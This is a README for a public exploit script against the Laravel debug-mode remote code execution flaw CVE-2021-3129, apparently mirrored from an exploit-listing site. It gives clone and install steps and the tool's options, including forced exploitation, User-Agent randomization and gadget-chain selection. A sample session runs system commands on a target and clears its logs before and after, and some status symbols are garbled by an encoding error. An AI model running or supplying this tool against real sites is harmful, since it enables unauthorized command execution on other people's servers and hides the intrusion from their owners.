## https://sploitus.com/exploit?id=35896337-DA85-5D42-B9FC-4DF2E3EC881E
# CVE-2021-3129 - Laravel RCE
## About
The script has been made for exploiting the Laravel RCE (CVE-2021-3129) vulnerability.<br>
This script allows you to write/execute commands on a website running <b>Laravel <= v8.4.2</b>, that has "APP_DEBUG" set to "true" in its ".env" file.
It currently has support for <b>searching the log file</b>, <b>executing commands</b>, <b>writing to the log file</b>, and support for <b>clearing log files</b>.
## Setup
```
$ git clone https://github.com/joshuavanderpoll/CVE-2021-3129.git
$ cd CVE-2021-3129
# pip install -r requirements.txt
# python3 CVE-2021-3129.py --help
```
## Options
```
usage: CVE-2021-3129.py [-h] [--host HOST] [--force] [--log LOG] [--ua]
[--chain CHAIN] [--chains]
Exploit CVE-2021-3129 - Laravel vulnerability exploit script
optional arguments:
-h, --help show this help message and exit
--host HOST Host URL to use exploit on
--force Force exploit without checking if vulnerable
--log LOG Full path to laravel.log file (e.g.
/var/www/html/storage/logs/laravel.log)
--ua Randomize User-Agent for requests
--chain CHAIN Select PHPGGC chain. Use "--chains" parameter to view all
available chains.
--chains View available chains for the "--chain" parameter
```
## Example
```
$ python3 CVE-2021-3129.py --host http://127.0.0.1/public/
Laravel Debug Mode CVE script
[โข] Made by: https://jvdpoll.nl
[@] Starting exploit on "http://127.0.0.1/public/"...
[@] Testing vulnerable URL http://127.0.0.1/public/_ignition/execute-solution...
[โ] Host seems vulnerable!
[@] Searching Laravel log file path...
[โข] Log path found: "/home/laravel/web/storage/logs/laravel.log"
[โข] Laravel log found: "/home/laravel/web/storage/logs/laravel.log".
[โข] Laravel version found: "7.22.4".
[โ] Laravel log file set to "/home/laravel/web/storage/logs/laravel.log".
[โข] Use "?" for a list of all possible actions.
[?] Please enter a command to execute: help
[โข] Available commands:
exit - Exit program.
help - Shows available commands.
clear_logs - Clears Laravel logs.
execute <command> - Execute system command.
write <command> - Write to log file.
[?] Please enter a command to execute: execute ls /home/laravel/web/
[@] Executing command "ls /home/laravel/web/"...
[@] Generating payload...
[โ] Generated payload.
[@] Clearing logs...
[โ] Cleared logs.
[@] Causing error in logs...
[โ] Caused error in logs.
[@] Sending payload...
[โ] Sent payload.
[@] Converting payload...
[โ] Converted payload.
[โ] Result:
README.md
app
artisan
bootstrap
composer.json
composer.lock
config
database
package.json
phpunit.xml
public
resources
routes
server.php
storage
tests
vendor
webpack.mix.js
[@] Clearing logs...
[โ] Cleared logs.
```
## Future:
- [ ] Automatically determine PHPGCC chain if version detected while scanning.
## Credits
- [PHPGGC](https://github.com/ambionics/phpggc)